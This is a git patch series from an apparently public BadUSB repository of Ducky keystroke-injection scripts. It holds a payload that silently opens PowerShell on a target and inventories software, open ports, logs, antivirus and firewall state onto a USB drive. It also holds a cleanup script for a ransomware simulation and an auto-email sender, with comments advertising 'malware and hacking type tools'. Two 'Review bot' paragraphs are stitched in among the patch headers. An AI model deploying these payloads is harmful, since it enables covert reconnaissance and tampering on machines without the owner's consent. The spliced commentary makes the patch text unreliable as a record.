+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-netipconfiguration
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking network settings: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-softwarevulnerabilities {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking software vulnerabilities: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-cve {
+DELAY 200
+ENTER
+DELAY 200
+STRING param (
+DELAY 200
+ENTER
+DELAY 200
+STRING [string]$productname,
+DELAY 200
+ENTER
+DELAY 200
+STRING [string]$version
+DELAY 200
+ENTER
+DELAY 200
+STRING )
+DELAY 200
+ENTER
+DELAY 200
+STRING $initialDelay = 2
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
+DELAY 200
+ENTER
+DELAY 200
+STRING start-sleep -seconds $initialDelay
+DELAY 200
+ENTER
+DELAY 200
+STRING $response = invoke-restmethod -uri $uri -method get
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($response.totalresults -gt 0) {
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($cve in $response.result.cve_items) {
+DELAY 200
+ENTER
+DELAY 200
+STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING } else {
+DELAY 200
+ENTER
+DELAY 200
+STRING "no cves found for $productname $version"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking CVEs: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($_.Exception -match '403') {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
+DELAY 200
+ENTER
+DELAY 200
+STRING start-sleep -seconds 60
+DELAY 200
+ENTER
+DELAY 200
+STRING $retryResponse = invoke-restmethod -uri $uri -method get
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($retryResponse.totalresults -gt 0) {
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($cve in $retryResponse.result.cve_items) {
+DELAY 200
+ENTER
+DELAY 200
+STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING } else {
+DELAY 200
+ENTER
+DELAY 200
+STRING "no cves found for $productname $version"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function analyze-logs {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-eventlog -logname system -newest 100
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error analyzing logs: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-openports {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING netstat -an
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking open ports: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-missingupdates {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Checking Windows Update logs..."
+DELAY 200
+ENTER
+DELAY 200
+STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
+DELAY 200
+ENTER
+DELAY 200
+STRING Get-WindowsUpdateLog -LogPath $updateLogPath
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "WindowsUpdate.log written to $updateLogPath"
+DELAY 200
+ENTER
+DELAY 200
+STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error getting Windows Update log: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-firewallstatus {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING netsh advfirewall show allprofiles
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking firewall status: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-smbv1status {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-windowsoptionalfeature -online -featurename smb1protocol
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking SMBv1 status: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-antivirusstatus {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-mpcomputerstatus
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking antivirus status: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING check-passwordpolicy >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING audit-services >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-networksettings >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-softwarevulnerabilities >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING analyze-logs >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-openports >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-missingupdates >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-firewallstatus >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-smbv1status >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-antivirusstatus >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+REM Dynamically identify critical software from running processes and scheduled tasks
+STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
+DELAY 200
+ENTER
+DELAY 200
+STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
+DELAY 200
+ENTER
+DELAY 200
+REM Combine running software and scheduled tasks
+STRING $softwareList = @()
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($process in $runningSoftware) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $softwareList += $process.Name
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($task in $scheduledTasks) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+REM Remove duplicates and empty entries
+STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
+DELAY 200
+ENTER
+DELAY 200
+REM Check CVEs for identified software
+STRING foreach ($software in $softwareList) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($version) {
+DELAY 200
+ENTER
+DELAY 200
+STRING check-cve -productname $software -version $version >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
+DELAY 200
+ENTER
+DELAY 200
+STRING start-sleep -seconds $initialDelay
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Results saved to USB drive."
+DELAY 200
+ENTER
+DELAY 200
+STRING } else {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error: USB drive MYUSB not found."
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING invoke-command -scriptblock $script
+DELAY 200
+ENTER
+DELAY 20000
+REM check out github.com/markcyber for more badusb/pen testing scripts and tools
From 7a7a9c879cd004a1fd9389baddef6df5f7264c2a Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:43:39 -0400
Subject: [PATCH 11/33] Rename BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt to BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt
---
 .../{ => InfoGathering}/RansomwareSimCleanup.txt | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename BadUSB/MarkCyber-BadUSB/RansomwareSimulation/{ => InfoGathering}/RansomwareSimCleanup.txt (100%)
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt
similarity index 100%
rename from BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
rename to BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt
From d9a69bc7ec146e2c2858760d0d3c350ea94ec0d1 Mon Sep 17 00:00:00 2001
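Review bot: The closing `STRING invoke-command -scriptblock $script` references a `$script` variable that is never assigned — every preceding line is typed and executed directly rather than collected into a scriptblock — so it only produces a null-argument binding error and should be removed together with the `REM Create the PowerShell script in memory and execute it` comment, which describes a design the file does not implement. The CVE lookup cannot return results as written: `$softwareList` holds process names and task executable names (e.g. `chrome`) that are compared with `-eq` against registry `DisplayName` values (e.g. `Google Chrome`), so `$version` stays empty and `check-cve` is never reached, and even on a match the `https://services.nvd.nist.gov/rest/json/cves/1.0` endpoint has been retired (NVD shut down its 1.0 APIs in 2023; the 2.0 API takes `keywordSearch=` rather than `keyword=`), which lands every call in the `catch` branch. `$initialDelay` is assigned inside `check-cve` but incremented at script scope with `$initialDelay += (Get-Random -Minimum 5 -Maximum 10)`, so the outer `start-sleep` backs off from `$null` rather than from 2; declare it once before the function definitions. `Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force` hard-codes the profile root, and `"$env:LOCALAPPDATA\Temp\WindowsUpdateLog\*"` names the same location without assuming `C:\Users`. The elevated PowerShell plus `set-executionpolicy bypass` plus an inventory of accounts policy, services, `netstat -an`, installed software and the system event log written to removable media is exactly the activity that PowerShell script-block logging (event 4104) and removable-media controls are tuned to surface, which the header's `Only use with permission` line should spell out so the owner of the results knows what alerts a run will generate.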
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:44:34 -0400
Subject: [PATCH 12/33] Delete BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering directory
---
 .../InfoGathering/RansomwareSimCleanup.txt | 61 -------------------
 1 file changed, 61 deletions(-)
 delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt
deleted file mode 100644
index 01776dbe..00000000
--- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt
+++ /dev/null
@@ -1,61 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% **This can be ran multiple times if necessary** %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 2000
-STRING powershell
-ENTER
-REM increased delays to make sure each command can go through even on slower computers
-DELAY 6000
-REM Define the locations using correct SpecialFolder enumerations
-STRING $folders = @(
-DELAY 1000
-ENTER
-DELAY 1000
-STRING [System.Environment+SpecialFolder]::Desktop,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::MyPictures,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::MyMusic,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::Downloads
-DELAY 1000
-ENTER
-DELAY 2000
-STRING )
-DELAY 1000
-ENTER
-DELAY 3000
-REM Iterate over each location
-STRING foreach ($folder in $folders) {
-DELAY 1000
-ENTER
-DELAY 1000
-STRING $path = [Environment]::GetFolderPath($folder)
-DELAY 1000
-ENTER
-DELAY 4000
-REM Get all .locked files in the path and rename them back
-STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace 
'\.locked$', '') }
-DELAY 2000
-ENTER
-DELAY 5000
-STRING }
-DELAY 1000
-ENTER
-DELAY 4000
-STRING exit
-DELAY 1000
-ENTER
From df9d6f886420366dd771f00b44678f0d5ff4cb7f Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:45:00 -0400
Subject: [PATCH 13/33] Create RansomwareSimCleanup.txt
--- .../RansomwareSimCleanup.txt | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt new file mode 100644
index 00000000..c2d5af81
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
@@ -0,0 +1,61 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 2000
+STRING powershell
+ENTER
+REM increased delays to make sure each command can go through even on slower computers
+DELAY 6000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+DELAY 1000
+ENTER
+DELAY 1000
+STRING [System.Environment+SpecialFolder]::Desktop,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::MyPictures,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::MyMusic,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::Downloads
+DELAY 1000
+ENTER
+DELAY 2000
+STRING )
+DELAY 1000
+ENTER
+DELAY 3000
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+DELAY 1000
+ENTER
+DELAY 1000
+STRING $path = [Environment]::GetFolderPath($folder)
+DELAY 1000
+ENTER
+DELAY 4000
+REM Get all .locked files in the path and rename them back
+STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace 
'\.locked$', '') }
+DELAY 2000
+ENTER
+DELAY 5000
+STRING }
+DELAY 1000
+ENTER
+DELAY 4000
+STRING exit
+DELAY 1000
+ENTER
From 70641c39fc0be9ce844c022edfeea8676d8523b4 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:46:03 -0400
Subject: [PATCH 14/33] Rename BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt to BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
--- BadUSB/MarkCyber-BadUSB/{ => HackerStuff}/CredentialHarvester.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/{ => HackerStuff}/CredentialHarvester.txt (100%)
diff --git a/BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt rename to BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
From bf9e50b28f80f7b58d4ba452dc8bceefdacfdd4d Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:46:25 -0400
Subject: [PATCH 15/33] Rename BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt to BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt
--- .../MarkCyber-BadUSB/{ => HackerStuff}/VulnerabilityScanner.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/{ => HackerStuff}/VulnerabilityScanner.txt (100%)
diff --git a/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt rename to BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt
From f945f6d2243af2b869fcc11af39089da8272398f Mon Sep 17 00:00:00 2001
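Review bot: `STRING [System.Environment+SpecialFolder]::Downloads` in the `$folders` array near the top of the hunk looks wrong: as far as I know the .NET `Environment.SpecialFolder` enum has no `Downloads` member (Desktop, MyPictures and MyMusic do exist), so that element either raises an error or evaluates to `$null` depending on strict mode, and in neither case does the `foreach` ever visit the Downloads folder — `.locked` files there are not restored by this cleanup. If a check of the enum confirms this, keep the three valid members in `$folders` and resolve Downloads separately, e.g. `STRING $paths = ($folders | ForEach-Object { [Environment]::GetFolderPath($_) }) + (Join-Path $env:USERPROFILE 'Downloads')` and then loop over `$paths` directly instead of calling `GetFolderPath` inside the loop. The header should also state that `Get-ChildItem -Path $path -File` is not recursive, so only files directly inside those folders are renamed back, e.g. `REM Only files directly in each folder are restored; subfolders are not walked`. This content was just deleted from the InfoGathering path in PATCH 12, so the commit is effectively a move and the defect predates it.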
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:47:15 -0400
Subject: [PATCH 16/33] Update CredentialHarvester.txt
--- BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt | 1 + 1 file changed, 1 insertion(+)
diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
index e0d83e27..d7a27cea 100644
--- a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
+++ b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
@@ -51,3 +51,4 @@ REM Close PowerShell
 STRING exit
 ENTER
 DELAY 500
+REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff
From c97826b0776c2dbc03f757cd76ef984c34427d40 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:48:08 -0400
Subject: [PATCH 17/33] Update RansomwareSimCleanup.txt
--- .../RansomwareSimulation/RansomwareSimCleanup.txt | 1 + 1 file changed, 1 insertion(+)
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
index c2d5af81..3be26299 100644
--- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
+++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
@@ -59,3 +59,4 @@ DELAY 4000
 STRING exit
 DELAY 1000
 ENTER
+REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff
From ddbaa6da6b412689cd405dc73976ed17a9ee5ea8 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:48:25 -0400
Subject: [PATCH 18/33] Update RansomwareSimMain.txt
--- .../MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
index aef51165..b35bd533 100644
--- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
+++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
@@ -88,4 +88,4 @@ DELAY 2000
 STRING exit
 DELAY 500
 ENTER
-REM check out my github at github.com/markcyber for more badusb tools
+REM check out my github at github.com/markcyber for more badusb & hacking type tools
From fc7cca09e33dda519033c05d1bcdc8c4b2bb0ce9 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:54:40 -0400
Subject: [PATCH 19/33] Create BadUSB-MarkCyber
--- BadUSB/BadUSB-MarkCyber | 1 + 1 file changed, 1 insertion(+) create mode 100644 BadUSB/BadUSB-MarkCyber
diff --git a/BadUSB/BadUSB-MarkCyber b/BadUSB/BadUSB-MarkCyber new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber
@@ -0,0 +1 @@
+
From b6d7de450147f0f42fab11fc86129c8477ac5e0f Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 15:03:23 -0400
Subject: [PATCH 20/33] Delete BadUSB/BadUSB-MarkCyber
--- BadUSB/BadUSB-MarkCyber | 1 - 1 file changed, 1 deletion(-) delete mode 100644 BadUSB/BadUSB-MarkCyber
diff --git a/BadUSB/BadUSB-MarkCyber b/BadUSB/BadUSB-MarkCyber deleted file mode 100644
index 8b137891..00000000
--- a/BadUSB/BadUSB-MarkCyber
+++ /dev/null
@@ -1 +0,0 @@
-
From 04f810f4ede30f6b321d02df56ceba15111c35c6 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 15:04:02 -0400
Subject: [PATCH 21/33] Rename EmailSender.txt to EmailSender.txt
--- .../{MarkCyber-BadUSB => BadUSB-MarkCyber}/Emails/EmailSender.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/{MarkCyber-BadUSB => BadUSB-MarkCyber}/Emails/EmailSender.txt (100%)
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt rename to BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
From 0e66119e09fdd830a97efb1d07b810d1bd9ba634 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 15:04:42 -0400
Subject: [PATCH 22/33] Delete BadUSB/BadUSB-MarkCyber/Emails directory
--- .../BadUSB-MarkCyber/Emails/EmailSender.txt | 42 ------------------- 1 file changed, 42 deletions(-) delete mode 100644 BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt deleted file mode 100644
index a3eadd1c..00000000
--- a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
+++ /dev/null
@@ -1,42 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
-REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
-REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
-REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
-REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 500
-STRING chrome
-ENTER
-DELAY 1000
-STRING https://mail.google.com/mail/u/0/#inbox?compose=new
-ENTER
-DELAY 5000
-DELAY 1000
-STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
-DELAY 500
-TAB
-TAB
-STRING {YOUR SUBJECT NAME}
-TAB
-STRING Hi {THEIR NAME}
-ENTER
-ENTER
-STRING {CONTENTS OF THE EMAIL}
-ENTER
-ENTER
-STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
-ENTER
-ENTER
-STRING Respectfully,
-ENTER
-ENTER
-STRING {YOUR NAME}
-ENTER
-CTRL ENTER
